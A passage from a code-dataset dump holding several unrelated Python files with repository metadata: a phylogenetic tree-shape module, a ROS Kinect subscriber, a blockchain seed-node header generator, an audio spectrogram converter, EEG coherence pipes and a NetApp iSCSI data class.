return self.compare(t2) != 0
def __ge__(self, t2):
"""
Uses the comparing method above to decide if self is greater or equal than T2.
:param t2: the `Shape` object against which we compare self.
:return: `bool` instance.
"""
return self.compare(t2) >= 0
def __gt__(self, t2):
"""
Uses the comparing method above to decide if self is greater than T2.
:param t2: the `Shape` object against which we compare self.
:return: `bool` instance.
"""
return self.compare(t2) > 0
def __str__(self):
from biotrees.shape.newick import to_newick
return to_newick(self)
def __repr__(self):
return str(self)
def shape(self):
"""
Returns the `Shape` associated to self. Namely, it "forgets" the labels of the leafs.
:return: `Shape` instance.
"""
return self
Shape.LEAF = Shape()
Shape.CHERRY = Shape([Shape.LEAF, Shape.LEAF])
def is_binary(t):
"""
Returns True if t is a binary shape.
:return: `bool` instance
"""
return t.is_leaf() or \
           (len(t.children) == 2 and all(is_binary(ch) for ch in t.children))
def count_leaves(t):
"""
Returns the number of leaves in t.
:return: `int` instance.
"""
if t.is_leaf():
return 1
else:
return sum(count_leaves(t) for t in t.children)
def get_depth(t):
"""
Returns an integer representing the maximal depth of the shape, from the root to one
of its furthest leaves.
:return: `int` instance.
"""
if t.is_leaf():
return 0
else:
return max(get_depth(ch) for ch in t.children) + 1
def leaf_depths(t):
"""
Returns a generator of integers representing the depth of each leaf in the tree
:return: generator of integers
"""
if t.is_leaf():
yield 0
else:
for ch in t.children:
for depth in leaf_depths(ch):
yield depth+1
def get_leaf_depths(t):
"""
Returns a list of integers representing the depth of each leaf in the tree
:return: list of integers
"""
return list(leaf_depths(t))
def count_nodes_by_depth(t):
total_depth = get_depth(t)
nodes_by_depth = [0]*(total_depth+1)
def navigate(t2, d):
if not t2.is_leaf():
d1 = d+1
nodes_by_depth[d1] += len(t2.children)
for ch in t2.children:
navigate(ch, d1)
nodes_by_depth[0] += 1
navigate(t, 0)
return nodes_by_depth
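# Illustrative sketch, not in the original module: building a four-leaf
# "comb" shape by hand and querying the helpers above. The expected values
# follow from the definitions in this file; the helper is left uncalled.
def _demo_comb_shape():
    comb = Shape([Shape.LEAF, Shape([Shape.LEAF, Shape.CHERRY])])
    assert is_binary(comb)
    assert count_leaves(comb) == 4
    assert get_depth(comb) == 3
    assert sorted(get_leaf_depths(comb)) == [1, 2, 3, 3]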
| 28.239819 | 121 | 0.577792 |
from biotrees.util import iter_merge, skip_nth
__all__ = ['Shape']
class Shape(object):
    LEAF = None
    CHERRY = None
def __init__(self, children=None):
assert children is None or len(children) > 0
self.children = children
def is_leaf(self):
return self.children is None
def clone(self):
if self.is_leaf():
return Shape.LEAF
else:
return Shape([ch.clone() for ch in self.children])
def _is_sorted(self):
if self.is_leaf():
return True
children = self.children
return all(ch._is_sorted() for ch in children) and \
all(ch1 <= ch2 for ch1, ch2 in zip(children[:-1], children[1:]))
def _sort(self):
if self.is_leaf():
return
for t in self.children:
t._sort()
self.children.sort()
def compare(self, t2):
if self.is_leaf() and t2.is_leaf():
return 0
elif self.is_leaf():
return -1
elif t2.is_leaf():
return 1
else:
c = len(self.children) - len(t2.children)
if c != 0:
return c
for t1, t2 in zip(self.children, t2.children):
c = t1.compare(t2)
if c != 0:
return c
return c
def __lt__(self, t2):
return self.compare(t2) < 0
def __le__(self, t2):
return self.compare(t2) <= 0
def __eq__(self, t2):
return self.compare(t2) == 0
def __ne__(self, t2):
return self.compare(t2) != 0
def __ge__(self, t2):
return self.compare(t2) >= 0
def __gt__(self, t2):
return self.compare(t2) > 0
def __str__(self):
from biotrees.shape.newick import to_newick
return to_newick(self)
def __repr__(self):
return str(self)
def shape(self):
return self
Shape.LEAF = Shape()
Shape.CHERRY = Shape([Shape.LEAF, Shape.LEAF])
def is_binary(t):
return t.is_leaf() or \
           (len(t.children) == 2 and all(is_binary(ch) for ch in t.children))
def count_leaves(t):
if t.is_leaf():
return 1
else:
return sum(count_leaves(t) for t in t.children)
def get_depth(t):
if t.is_leaf():
return 0
else:
return max(get_depth(ch) for ch in t.children) + 1
def leaf_depths(t):
if t.is_leaf():
yield 0
else:
for ch in t.children:
for depth in leaf_depths(ch):
yield depth+1
def get_leaf_depths(t):
return list(leaf_depths(t))
def count_nodes_by_depth(t):
total_depth = get_depth(t)
nodes_by_depth = [0]*(total_depth+1)
def navigate(t2, d):
if not t2.is_leaf():
d1 = d+1
nodes_by_depth[d1] += len(t2.children)
for ch in t2.children:
navigate(ch, d1)
nodes_by_depth[0] += 1
navigate(t, 0)
return nodes_by_depth
| true | true |
1c4a9e04658f85d01a0faf1688239f940ae2016c | 552 | py | Python | scripts/subscribe_kinect.py | hubertbraszko/follow-marker | 2c168c2c9705fc2076712e20c62e05a439df6cf8 | [
"BSD-3-Clause"
] | null | null | null | scripts/subscribe_kinect.py | hubertbraszko/follow-marker | 2c168c2c9705fc2076712e20c62e05a439df6cf8 | [
"BSD-3-Clause"
] | null | null | null | scripts/subscribe_kinect.py | hubertbraszko/follow-marker | 2c168c2c9705fc2076712e20c62e05a439df6cf8 | [
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
import rospy
from std_msgs.msg import String
import sys
import cv2
from cv_bridge import CvBridge
from sensor_msgs.msg import Image
def process_image(msg):
bridge = CvBridge()
img = bridge.imgmsg_to_cv2(msg, "bgr8")
cv2.imshow("image",img)
cv2.waitKey(50)
if __name__ == '__main__':
while not rospy.is_shutdown():
rospy.init_node('kinect_subscriber')
rospy.loginfo('image_sub node started')
rospy.Subscriber("/base_kinect/color/image_raw", Image, process_image)
rospy.spin()
| 25.090909 | 78 | 0.706522 | import rospy
from std_msgs.msg import String
import sys
import cv2
from cv_bridge import CvBridge
from sensor_msgs.msg import Image
def process_image(msg):
bridge = CvBridge()
img = bridge.imgmsg_to_cv2(msg, "bgr8")
cv2.imshow("image",img)
cv2.waitKey(50)
if __name__ == '__main__':
while not rospy.is_shutdown():
rospy.init_node('kinect_subscriber')
rospy.loginfo('image_sub node started')
rospy.Subscriber("/base_kinect/color/image_raw", Image, process_image)
rospy.spin()
| true | true |
1c4a9e3834a7eccc3c3b7c6fddcede09ac3c225d | 4,372 | py | Python | contrib/seeds/generate-seeds.py | pniwre/Sato_origin | 5accbe690dbd2cae305cc7120a4824243f89701c | [
"MIT"
] | null | null | null | contrib/seeds/generate-seeds.py | pniwre/Sato_origin | 5accbe690dbd2cae305cc7120a4824243f89701c | [
"MIT"
] | null | null | null | contrib/seeds/generate-seeds.py | pniwre/Sato_origin | 5accbe690dbd2cae305cc7120a4824243f89701c | [
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2014-2017 Wladimir J. van der Laan
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Script to generate list of seed nodes for chainparams.cpp.
This script expects two text files in the directory that is passed as an
argument:
nodes_main.txt
nodes_test.txt
These files must consist of lines in the format
<ip>
<ip>:<port>
[<ipv6>]
[<ipv6>]:<port>
<onion>.onion
0xDDBBCCAA (IPv4 little-endian old pnSeeds format)
The output will be two data structures with the peers in binary format:
static SeedSpec6 pnSeed6_main[]={
...
}
static SeedSpec6 pnSeed6_test[]={
...
}
These should be pasted into `src/chainparamsseeds.h`.
'''
from base64 import b32decode
from binascii import a2b_hex
import sys, os
import re
# ipv4 in ipv6 prefix
pchIPv4 = bytearray([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xff])
# tor-specific ipv6 prefix
pchOnionCat = bytearray([0xFD,0x87,0xD8,0x7E,0xEB,0x43])
def name_to_ipv6(addr):
if len(addr)>6 and addr.endswith('.onion'):
vchAddr = b32decode(addr[0:-6], True)
if len(vchAddr) != 16-len(pchOnionCat):
            raise ValueError('Invalid onion %s' % addr)
return pchOnionCat + vchAddr
elif '.' in addr: # IPv4
return pchIPv4 + bytearray((int(x) for x in addr.split('.')))
elif ':' in addr: # IPv6
sub = [[], []] # prefix, suffix
x = 0
addr = addr.split(':')
for i,comp in enumerate(addr):
if comp == '':
if i == 0 or i == (len(addr)-1): # skip empty component at beginning or end
continue
x += 1 # :: skips to suffix
assert(x < 2)
else: # two bytes per component
val = int(comp, 16)
sub[x].append(val >> 8)
sub[x].append(val & 0xff)
nullbytes = 16 - len(sub[0]) - len(sub[1])
assert((x == 0 and nullbytes == 0) or (x == 1 and nullbytes > 0))
return bytearray(sub[0] + ([0] * nullbytes) + sub[1])
elif addr.startswith('0x'): # IPv4-in-little-endian
return pchIPv4 + bytearray(reversed(a2b_hex(addr[2:])))
else:
raise ValueError('Could not parse address %s' % addr)
def parse_spec(s, defaultport):
    match = re.match(r'\[([0-9a-fA-F:]+)\](?::([0-9]+))?$', s)
if match: # ipv6
host = match.group(1)
port = match.group(2)
elif s.count(':') > 1: # ipv6, no port
host = s
port = ''
else:
(host,_,port) = s.partition(':')
if not port:
port = defaultport
else:
port = int(port)
host = name_to_ipv6(host)
return (host,port)
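# Illustrative sketch, not part of the original script: what parse_spec and
# name_to_ipv6 produce for a plain IPv4 seed. The expected bytes are the
# IPv4-mapped IPv6 form built from pchIPv4; the helper is left uncalled.
def _demo_parse_ipv4_seed():
    host, port = parse_spec('1.2.3.4:8767', 8767)
    assert port == 8767
    assert host == pchIPv4 + bytearray([1, 2, 3, 4])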
def process_nodes(g, f, structname, defaultport):
g.write('static SeedSpec6 %s[] = {\n' % structname)
first = True
for line in f:
comment = line.find('#')
if comment != -1:
line = line[0:comment]
line = line.strip()
if not line:
continue
if not first:
g.write(',\n')
first = False
(host,port) = parse_spec(line, defaultport)
hoststr = ','.join(('0x%02x' % b) for b in host)
g.write(' {{%s}, %i}' % (hoststr, port))
g.write('\n};\n')
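# Illustrative sketch, not part of the original script: the C array entry
# that process_nodes() emits for one seed, reproduced standalone as a
# formatting reference. The helper name is invented and left uncalled.
def _demo_expected_entry():
    host, port = parse_spec('1.2.3.4', 8767)
    entry = '{{%s}, %i}' % (','.join('0x%02x' % b for b in host), port)
    assert entry.endswith('0x01,0x02,0x03,0x04}, 8767}')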
def main():
if len(sys.argv)<2:
print(('Usage: %s <path_to_nodes_txt>' % sys.argv[0]), file=sys.stderr)
sys.exit(1)
g = sys.stdout
indir = sys.argv[1]
g.write('#ifndef RAVEN_CHAINPARAMSSEEDS_H\n')
g.write('#define RAVEN_CHAINPARAMSSEEDS_H\n')
g.write('/**\n')
g.write(' * List of fixed seed nodes for the sato network\n')
g.write(' * AUTOGENERATED by contrib/seeds/generate-seeds.py\n')
g.write(' *\n')
g.write(' * Each line contains a 16-byte IPv6 address and a port.\n')
g.write(' * IPv4 as well as onion addresses are wrapped inside a IPv6 address accordingly.\n')
g.write(' */\n')
with open(os.path.join(indir,'nodes_main.txt'), 'r', encoding="utf8") as f:
process_nodes(g, f, 'pnSeed6_main', 8767)
g.write('\n')
with open(os.path.join(indir,'nodes_test.txt'), 'r', encoding="utf8") as f:
process_nodes(g, f, 'pnSeed6_test', 18767)
g.write('#endif // RAVEN_CHAINPARAMSSEEDS_H\n')
if __name__ == '__main__':
main()
| 31.453237 | 98 | 0.579597 |
from base64 import b32decode
from binascii import a2b_hex
import sys, os
import re
pchIPv4 = bytearray([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xff])
pchOnionCat = bytearray([0xFD,0x87,0xD8,0x7E,0xEB,0x43])
def name_to_ipv6(addr):
if len(addr)>6 and addr.endswith('.onion'):
vchAddr = b32decode(addr[0:-6], True)
if len(vchAddr) != 16-len(pchOnionCat):
            raise ValueError('Invalid onion %s' % addr)
return pchOnionCat + vchAddr
    elif '.' in addr:
        return pchIPv4 + bytearray((int(x) for x in addr.split('.')))
    elif ':' in addr:
        sub = [[], []]
        x = 0
addr = addr.split(':')
for i,comp in enumerate(addr):
if comp == '':
                if i == 0 or i == (len(addr)-1):
                    continue
                x += 1
                assert(x < 2)
            else:
                val = int(comp, 16)
sub[x].append(val >> 8)
sub[x].append(val & 0xff)
nullbytes = 16 - len(sub[0]) - len(sub[1])
assert((x == 0 and nullbytes == 0) or (x == 1 and nullbytes > 0))
return bytearray(sub[0] + ([0] * nullbytes) + sub[1])
    elif addr.startswith('0x'):
        return pchIPv4 + bytearray(reversed(a2b_hex(addr[2:])))
else:
raise ValueError('Could not parse address %s' % addr)
def parse_spec(s, defaultport):
    match = re.match(r'\[([0-9a-fA-F:]+)\](?::([0-9]+))?$', s)
    if match:
        host = match.group(1)
        port = match.group(2)
    elif s.count(':') > 1:
        host = s
        port = ''
else:
(host,_,port) = s.partition(':')
if not port:
port = defaultport
else:
port = int(port)
host = name_to_ipv6(host)
return (host,port)
def process_nodes(g, f, structname, defaultport):
g.write('static SeedSpec6 %s[] = {\n' % structname)
first = True
for line in f:
comment = line.find('#')
if comment != -1:
line = line[0:comment]
line = line.strip()
if not line:
continue
if not first:
g.write(',\n')
first = False
(host,port) = parse_spec(line, defaultport)
hoststr = ','.join(('0x%02x' % b) for b in host)
g.write(' {{%s}, %i}' % (hoststr, port))
g.write('\n};\n')
def main():
if len(sys.argv)<2:
print(('Usage: %s <path_to_nodes_txt>' % sys.argv[0]), file=sys.stderr)
sys.exit(1)
g = sys.stdout
indir = sys.argv[1]
g.write('#ifndef RAVEN_CHAINPARAMSSEEDS_H\n')
g.write('#define RAVEN_CHAINPARAMSSEEDS_H\n')
g.write('/**\n')
g.write(' * List of fixed seed nodes for the sato network\n')
g.write(' * AUTOGENERATED by contrib/seeds/generate-seeds.py\n')
g.write(' *\n')
g.write(' * Each line contains a 16-byte IPv6 address and a port.\n')
g.write(' * IPv4 as well as onion addresses are wrapped inside a IPv6 address accordingly.\n')
g.write(' */\n')
with open(os.path.join(indir,'nodes_main.txt'), 'r', encoding="utf8") as f:
process_nodes(g, f, 'pnSeed6_main', 8767)
g.write('\n')
with open(os.path.join(indir,'nodes_test.txt'), 'r', encoding="utf8") as f:
process_nodes(g, f, 'pnSeed6_test', 18767)
g.write('#endif // RAVEN_CHAINPARAMSSEEDS_H\n')
if __name__ == '__main__':
main()
| true | true |
1c4a9e6deb4f7f104b05973b61354f9580522564 | 460 | py | Python | bin/rehex.py | CryptoDEX/sentinel | 88ac417f34c4f42670298abf3f252ab8652b7887 | [
"MIT"
] | null | null | null | bin/rehex.py | CryptoDEX/sentinel | 88ac417f34c4f42670298abf3f252ab8652b7887 | [
"MIT"
] | null | null | null | bin/rehex.py | CryptoDEX/sentinel | 88ac417f34c4f42670298abf3f252ab8652b7887 | [
"MIT"
] | null | null | null |
import simplejson
import binascii
import sys
import pdb
from pprint import pprint
import sys
import os
sys.path.append(os.path.normpath(os.path.join(os.path.dirname(__file__), '../lib')))
import cryptodexlib
# ============================================================================
usage = "%s <hex>" % sys.argv[0]
obj = None
if len(sys.argv) < 2:
print(usage)
sys.exit(1)
else:
obj = cryptodexlib.deserialise(sys.argv[1])
pdb.set_trace()
1
| 20.909091 | 84 | 0.591304 |
import simplejson
import binascii
import sys
import pdb
from pprint import pprint
import sys
import os
sys.path.append(os.path.normpath(os.path.join(os.path.dirname(__file__), '../lib')))
import cryptodexlib
usage = "%s <hex>" % sys.argv[0]
obj = None
if len(sys.argv) < 2:
print(usage)
sys.exit(1)
else:
obj = cryptodexlib.deserialise(sys.argv[1])
pdb.set_trace()
1
| true | true |
1c4a9e7ab48b06150d1646076a4a5a0117b6efcc | 2,186 | py | Python | utils/modify_ravdess.py | sahiljuneja/kaggle-ctds | caac226f2c5d33b6d324c5cf33a777758b9163d1 | [
"CC-BY-4.0"
] | null | null | null | utils/modify_ravdess.py | sahiljuneja/kaggle-ctds | caac226f2c5d33b6d324c5cf33a777758b9163d1 | [
"CC-BY-4.0"
] | null | null | null | utils/modify_ravdess.py | sahiljuneja/kaggle-ctds | caac226f2c5d33b6d324c5cf33a777758b9163d1 | [
"CC-BY-4.0"
] | null | null | null | import re
import os
import argparse
import librosa
import librosa.display
import matplotlib.pyplot as plt
import numpy as np
def modify_data(input_path, save_path, dir_dict):
path = os.listdir(input_path)
for folders in path:
folders = os.path.sep.join([input_path, folders])
for file in os.listdir(folders):
            num = re.findall(r'\d+', file)
emotion = dir_dict[num[2]]
file_save_path = save_path + str(emotion)
if not os.path.isdir(file_save_path):
os.makedirs(file_save_path)
load_file_path = '{0}/{1}'.format(folders, file)
file_name = "/{}.jpeg".format(file[:-4])
if not os.path.isfile(file_save_path + file_name):
y, sr = librosa.load(load_file_path)
yt, _ = librosa.effects.trim(y)
y = yt
mel_spect = librosa.feature.melspectrogram(y=y, sr=sr, n_fft=1024, hop_length=100)
mel_spect = librosa.power_to_db(mel_spect, ref=np.max)
librosa.display.specshow(mel_spect, y_axis='mel', fmax=20000, x_axis='time');
plt.savefig(file_save_path + file_name)
#print("File saved to: {}".format(file_save_path + file_name))
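# Illustrative sketch (hypothetical file name, not in the original script):
# the same trim -> mel-spectrogram -> dB pipeline used above, reduced to a
# single file for experimentation; left uncalled.
def _demo_single_file(wav_path="example.wav"):
    y, sr = librosa.load(wav_path)
    y, _ = librosa.effects.trim(y)
    mel = librosa.feature.melspectrogram(y=y, sr=sr, n_fft=1024, hop_length=100)
    return librosa.power_to_db(mel, ref=np.max)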
if __name__ == "__main__":
# sample call
# python modify_ravdess.py -p /notebooks/storage/ravdess/ -s /notebooks/storage/ravdess_mod/
# arguments parser
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--path", type=str, help="path to raw data")
ap.add_argument("-s", "--save", type=str, help="path to save data after processing")
args = vars(ap.parse_args())
# directory structure dict
dir_dict = {'01' : 'neutral', '02' : 'calm', '03' : 'happy', '04' : 'sad',
'05' : 'angry', '06' : 'fearful', '07' : 'disgust', '08' : 'surprised'}
ip_path = args["path"]
save_path = args["save"]
if not os.path.isdir(save_path):
os.makedirs(save_path)
modify_data(ip_path, save_path, dir_dict)
print("Data converted from .wav to .jpeg")
| 31.681159 | 98 | 0.578225 |
import re
import os
import argparse
import librosa
import librosa.display
import matplotlib.pyplot as plt
import numpy as np
def modify_data(input_path, save_path, dir_dict):
path = os.listdir(input_path)
for folders in path:
folders = os.path.sep.join([input_path, folders])
for file in os.listdir(folders):
            num = re.findall(r'\d+', file)
emotion = dir_dict[num[2]]
file_save_path = save_path + str(emotion)
if not os.path.isdir(file_save_path):
os.makedirs(file_save_path)
load_file_path = '{0}/{1}'.format(folders, file)
file_name = "/{}.jpeg".format(file[:-4])
if not os.path.isfile(file_save_path + file_name):
y, sr = librosa.load(load_file_path)
yt, _ = librosa.effects.trim(y)
y = yt
mel_spect = librosa.feature.melspectrogram(y=y, sr=sr, n_fft=1024, hop_length=100)
mel_spect = librosa.power_to_db(mel_spect, ref=np.max)
librosa.display.specshow(mel_spect, y_axis='mel', fmax=20000, x_axis='time');
plt.savefig(file_save_path + file_name)
if __name__ == "__main__":
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--path", type=str, help="path to raw data")
ap.add_argument("-s", "--save", type=str, help="path to save data after processing")
args = vars(ap.parse_args())
dir_dict = {'01' : 'neutral', '02' : 'calm', '03' : 'happy', '04' : 'sad',
'05' : 'angry', '06' : 'fearful', '07' : 'disgust', '08' : 'surprised'}
ip_path = args["path"]
save_path = args["save"]
if not os.path.isdir(save_path):
os.makedirs(save_path)
modify_data(ip_path, save_path, dir_dict)
print("Data converted from .wav to .jpeg")
| true | true |
1c4aa08fdf2f3f6ab9a83890a7c17c9b27fbc3ac | 6,062 | py | Python | dyne/adjacency/coherence.py | akhambhati/dyne2 | d2f050b3d14ef429fc9c52821e87f1c9a52a521d | [
"BSD-3-Clause"
] | 7 | 2015-01-11T03:57:19.000Z | 2020-07-11T12:05:57.000Z | dyne/adjacency/coherence.py | akhambhati/dyne | d2f050b3d14ef429fc9c52821e87f1c9a52a521d | [
"BSD-3-Clause"
] | null | null | null | dyne/adjacency/coherence.py | akhambhati/dyne | d2f050b3d14ef429fc9c52821e87f1c9a52a521d | [
"BSD-3-Clause"
] | null | null | null |
"""
Coherence pipes for quantifying signal similarity (i.e. connectivity)
Created by: Ankit Khambhati
Change Log
----------
2016/03/06 - Implemented WelchCoh and MTCoh pipes
"""
from __future__ import division
import numpy as np
from mtspec import mt_coherence, mtspec
from scipy.signal import coherence
import matplotlib.pyplot as plt
from ..errors import check_type
from ..base import AdjacencyPipe
class WelchCoh(AdjacencyPipe):
"""
WelchCoh pipe for spectral coherence estimation using Welch's method
Parameters
----------
window: str
Desired window to use. See Scipy get_window for a list of windows.
    secperseg: float
        Length of each segment in seconds. Half the window length is
        recommended.
    pctoverlap: float (0<x<1)
        Fractional overlap between segments. A value of 0.5 (50%) is
        recommended.
cf: list
Frequency range over which to compute coherence [-NW+C, C+NW]
"""
def __init__(self, window, secperseg, pctoverlap, cf):
# Standard param checks
check_type(window, str)
check_type(secperseg, float)
check_type(pctoverlap, float)
check_type(cf, list)
if not len(cf) == 2:
raise Exception('Must give a frequency range in list of length 2')
if (pctoverlap > 1) or (pctoverlap < 0):
raise Exception('Percent overlap must be a positive fraction')
# Assign to instance
self.window = window
self.secperseg = secperseg
self.pctoverlap = pctoverlap
self.cf = cf
def _pipe_as_flow(self, signal_packet):
# Get signal_packet details
hkey = signal_packet.keys()[0]
ax_0_ix = signal_packet[hkey]['meta']['ax_0']['index']
ax_1_ix = signal_packet[hkey]['meta']['ax_1']['index']
signal = signal_packet[hkey]['data']
fs = np.int(np.mean(1./np.diff(ax_0_ix)))
# Assume undirected connectivity
triu_ix, triu_iy = np.triu_indices(len(ax_1_ix), k=1)
# Initialize association matrix
adj = np.zeros((len(ax_1_ix), len(ax_1_ix)))
# Derive signal segmenting for coherence estimation
nperseg = int(self.secperseg*fs)
noverlap = int(self.secperseg*fs*self.pctoverlap)
freq, Cxy = coherence(signal[:, triu_ix],
signal[:, triu_iy],
fs=fs, window=self.window,
nperseg=nperseg, noverlap=noverlap,
axis=0)
# Find closest frequency to the desired center frequency
cf_idx = np.flatnonzero((freq >= self.cf[0]) &
(freq <= self.cf[1]))
# Store coherence in association matrix
adj[triu_ix, triu_iy] = np.mean(Cxy[cf_idx, :], axis=0)
adj += adj.T
new_packet = {}
new_packet[hkey] = {
'data': adj,
'meta': {
'ax_0': signal_packet[hkey]['meta']['ax_1'],
'ax_1': signal_packet[hkey]['meta']['ax_1'],
'time': {
'label': 'Time (sec)',
'index': np.float(ax_0_ix[-1])
}
}
}
return new_packet
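# Illustrative sketch, not part of the original pipe: the core scipy call
# WelchCoh relies on, band-averaged between two frequencies for a pair of
# synthetic channels. All parameter values here are invented examples.
def _demo_welch_band_coherence():
    fs = 250
    t = np.arange(0, 10, 1.0 / fs)
    x = np.sin(2 * np.pi * 12 * t) + 0.1 * np.random.randn(t.size)
    y = np.sin(2 * np.pi * 12 * t) + 0.1 * np.random.randn(t.size)
    freq, cxy = coherence(x, y, fs=fs, window='hann',
                          nperseg=fs, noverlap=fs // 2)
    band = np.flatnonzero((freq >= 8) & (freq <= 16))
    # Strongly correlated 12 Hz channels give a band coherence near 1.
    return np.mean(cxy[band])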
class MTCoh(AdjacencyPipe):
"""
MTCoh pipe for spectral coherence estimation using
multitaper methods
Parameters
----------
time_band: float
        The time half-bandwidth product NW of the estimate [-NW, NW],
        such that the spectral resolution is 2*NW
n_taper: int
Number of Slepian sequences to use (Usually < 2*NW-1)
cf: list
Frequency range over which to compute coherence [-NW+C, C+NW]
"""
def __init__(self, time_band, n_taper, cf):
# Standard param checks
check_type(time_band, float)
check_type(n_taper, int)
check_type(cf, list)
if n_taper >= 2*time_band:
raise Exception('Number of tapers must be less than 2*time_band')
if not len(cf) == 2:
raise Exception('Must give a frequency range in list of length 2')
# Assign instance parameters
self.time_band = time_band
self.n_taper = n_taper
self.cf = cf
def _pipe_as_flow(self, signal_packet):
# Get signal_packet details
hkey = signal_packet.keys()[0]
ax_0_ix = signal_packet[hkey]['meta']['ax_0']['index']
ax_1_ix = signal_packet[hkey]['meta']['ax_1']['index']
signal = signal_packet[hkey]['data']
fs = np.int(np.mean(1./np.diff(ax_0_ix)))
# Assume undirected connectivity
triu_ix, triu_iy = np.triu_indices(len(ax_1_ix), k=1)
# Initialize association matrix
adj = np.zeros((len(ax_1_ix), len(ax_1_ix)))
# Compute all coherences
for n1, n2 in zip(triu_ix, triu_iy):
out = mt_coherence(1.0/fs,
signal[:, n1],
signal[:, n2],
self.time_band,
self.n_taper,
int(len(ax_0_ix)/2.), 0.95,
iadapt=1,
cohe=True, freq=True)
# Find closest frequency to the desired center frequency
#cf_idx = np.argmin(np.abs(out['freq'] - self.cf))
cf_idx = np.flatnonzero((out['freq'] >= self.cf[0]) &
(out['freq'] <= self.cf[1]))
# Store coherence in association matrix
adj[n1, n2] = np.mean(out['cohe'][cf_idx])
adj += adj.T
new_packet = {}
new_packet[hkey] = {
'data': adj,
'meta': {
'ax_0': signal_packet[hkey]['meta']['ax_1'],
'ax_1': signal_packet[hkey]['meta']['ax_1'],
'time': {
'label': 'Time (sec)',
'index': np.float(ax_0_ix[-1])
}
}
}
return new_packet
| 32.591398 | 81 | 0.54421 |
from __future__ import division
import numpy as np
from mtspec import mt_coherence, mtspec
from scipy.signal import coherence
import matplotlib.pyplot as plt
from ..errors import check_type
from ..base import AdjacencyPipe
class WelchCoh(AdjacencyPipe):
def __init__(self, window, secperseg, pctoverlap, cf):
check_type(window, str)
check_type(secperseg, float)
check_type(pctoverlap, float)
check_type(cf, list)
if not len(cf) == 2:
raise Exception('Must give a frequency range in list of length 2')
if (pctoverlap > 1) or (pctoverlap < 0):
raise Exception('Percent overlap must be a positive fraction')
self.window = window
self.secperseg = secperseg
self.pctoverlap = pctoverlap
self.cf = cf
def _pipe_as_flow(self, signal_packet):
hkey = signal_packet.keys()[0]
ax_0_ix = signal_packet[hkey]['meta']['ax_0']['index']
ax_1_ix = signal_packet[hkey]['meta']['ax_1']['index']
signal = signal_packet[hkey]['data']
fs = np.int(np.mean(1./np.diff(ax_0_ix)))
triu_ix, triu_iy = np.triu_indices(len(ax_1_ix), k=1)
adj = np.zeros((len(ax_1_ix), len(ax_1_ix)))
nperseg = int(self.secperseg*fs)
noverlap = int(self.secperseg*fs*self.pctoverlap)
freq, Cxy = coherence(signal[:, triu_ix],
signal[:, triu_iy],
fs=fs, window=self.window,
nperseg=nperseg, noverlap=noverlap,
axis=0)
cf_idx = np.flatnonzero((freq >= self.cf[0]) &
(freq <= self.cf[1]))
adj[triu_ix, triu_iy] = np.mean(Cxy[cf_idx, :], axis=0)
adj += adj.T
new_packet = {}
new_packet[hkey] = {
'data': adj,
'meta': {
'ax_0': signal_packet[hkey]['meta']['ax_1'],
'ax_1': signal_packet[hkey]['meta']['ax_1'],
'time': {
'label': 'Time (sec)',
'index': np.float(ax_0_ix[-1])
}
}
}
return new_packet
class MTCoh(AdjacencyPipe):
def __init__(self, time_band, n_taper, cf):
check_type(time_band, float)
check_type(n_taper, int)
check_type(cf, list)
if n_taper >= 2*time_band:
raise Exception('Number of tapers must be less than 2*time_band')
if not len(cf) == 2:
raise Exception('Must give a frequency range in list of length 2')
self.time_band = time_band
self.n_taper = n_taper
self.cf = cf
def _pipe_as_flow(self, signal_packet):
hkey = signal_packet.keys()[0]
ax_0_ix = signal_packet[hkey]['meta']['ax_0']['index']
ax_1_ix = signal_packet[hkey]['meta']['ax_1']['index']
signal = signal_packet[hkey]['data']
fs = np.int(np.mean(1./np.diff(ax_0_ix)))
triu_ix, triu_iy = np.triu_indices(len(ax_1_ix), k=1)
adj = np.zeros((len(ax_1_ix), len(ax_1_ix)))
for n1, n2 in zip(triu_ix, triu_iy):
out = mt_coherence(1.0/fs,
signal[:, n1],
signal[:, n2],
self.time_band,
self.n_taper,
int(len(ax_0_ix)/2.), 0.95,
iadapt=1,
cohe=True, freq=True)
cf_idx = np.flatnonzero((out['freq'] >= self.cf[0]) &
(out['freq'] <= self.cf[1]))
adj[n1, n2] = np.mean(out['cohe'][cf_idx])
adj += adj.T
new_packet = {}
new_packet[hkey] = {
'data': adj,
'meta': {
'ax_0': signal_packet[hkey]['meta']['ax_1'],
'ax_1': signal_packet[hkey]['meta']['ax_1'],
'time': {
'label': 'Time (sec)',
'index': np.float(ax_0_ix[-1])
}
}
}
return new_packet
| true | true |
1c4aa09a56123eb89175e65ef12cd083888a57e1 | 3,456 | py | Python | generated-libraries/python/netapp/iscsi/iscsi_security_entry_info.py | radekg/netapp-ontap-lib-get | 6445ebb071ec147ea82a486fbe9f094c56c5c40d | [
"MIT"
] | 2 | 2017-03-28T15:31:26.000Z | 2018-08-16T22:15:18.000Z | generated-libraries/python/netapp/iscsi/iscsi_security_entry_info.py | radekg/netapp-ontap-lib-get | 6445ebb071ec147ea82a486fbe9f094c56c5c40d | [
"MIT"
] | null | null | null | generated-libraries/python/netapp/iscsi/iscsi_security_entry_info.py | radekg/netapp-ontap-lib-get | 6445ebb071ec147ea82a486fbe9f094c56c5c40d | [
"MIT"
] | null | null | null |
from netapp.netapp_object import NetAppObject
class IscsiSecurityEntryInfo(NetAppObject):
"""
Information about a single authentication entry.
"""
_user_name = None
@property
def user_name(self):
"""
Inbound CHAP user name, returned only if auth-type is CHAP.
"""
return self._user_name
@user_name.setter
def user_name(self, val):
if val != None:
self.validate('user_name', val)
self._user_name = val
_auth_chap_policy = None
@property
def auth_chap_policy(self):
"""
CHAP authentication path. Possible values: "local",
"radius".
"""
return self._auth_chap_policy
@auth_chap_policy.setter
def auth_chap_policy(self, val):
if val != None:
self.validate('auth_chap_policy', val)
self._auth_chap_policy = val
_initiator = None
@property
def initiator(self):
"""
Name of initiator. The initiator name must conform to
RFC 3720, for example:
"iqn.1987-06.com.initvendor1:appsrv.sn.2346",
or "default" if this is a default auth entry.
"""
return self._initiator
@initiator.setter
def initiator(self, val):
if val != None:
self.validate('initiator', val)
self._initiator = val
_vserver = None
@property
def vserver(self):
"""
Vserver containing this authentication information.
"""
return self._vserver
@vserver.setter
def vserver(self, val):
if val != None:
